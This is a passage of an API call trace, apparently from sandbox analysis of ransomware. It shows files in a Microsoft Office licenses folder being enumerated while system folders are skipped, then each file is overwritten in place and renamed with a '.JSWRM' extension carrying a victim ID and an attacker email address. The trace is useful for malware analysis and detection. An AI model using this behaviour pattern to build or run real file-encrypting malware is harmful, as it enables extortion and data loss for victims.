lpString2=".") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.027] lstrcmpiW (lpString1="PowerPointR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241100, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240f70, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0107.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0107.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.028] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20782) returned 1 [0107.028] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0107.028] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0107.031] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.031] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0107.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.031] CloseHandle (hObject=0x45c) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0107.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0107.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0107.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0107.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0107.033] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe85bfe34, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe85bfe34, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe86caea3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Retail-ul-oob.xrm-ms", cAlternateFileName="PO6F78~1.XRM")) returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.033] lstrcmpiW (lpString1="PowerPointR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0107.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0107.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0107.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0107.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.034] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.034] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11599) returned 1 [0107.034] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0107.034] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0107.036] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.037] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0107.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.037] CloseHandle (hObject=0x45c) returned 1 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0107.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0107.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0107.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0107.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.037] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0107.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0107.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.038] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.038] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe854d708, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe854d708, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe865879c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Retail-ul-phn.xrm-ms", cAlternateFileName="POC239~1.XRM")) returned 1 [0107.038] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.038] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.038] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.038] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.038] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.039] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.039] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.039] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.039] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.039] lstrcmpiW (lpString1="PowerPointR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Retail-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0107.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.040] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19944) returned 1 [0107.040] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0107.040] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0107.042] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.042] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0107.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.043] CloseHandle (hObject=0x45c) returned 1 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0107.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0107.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0107.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0107.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0107.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.044] HeapFree 